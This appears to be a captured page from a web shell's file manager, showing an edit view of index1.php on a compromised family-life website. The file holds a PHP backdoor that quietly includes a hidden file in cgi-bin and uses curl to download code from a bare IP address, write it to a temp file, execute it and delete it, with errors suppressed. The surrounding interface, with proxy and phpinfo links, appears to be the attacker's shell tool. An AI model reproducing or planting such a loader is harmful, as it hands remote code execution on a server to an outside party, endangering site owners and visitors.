File manager - Edit - /home/familylifersmpc/htdocs/www.familylifersmpc.com/index1.php
Back
<?php @include_once("cgi-bin/.fam"); ?><?php $f = @tempnam(@sys_get_temp_dir(),""); $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://63.141.224.2/z60630_o/stat/index.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } @file_put_contents($f, $result); @include $f; @unlink($f);
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.03 |
proxy
|
phpinfo
|
Settings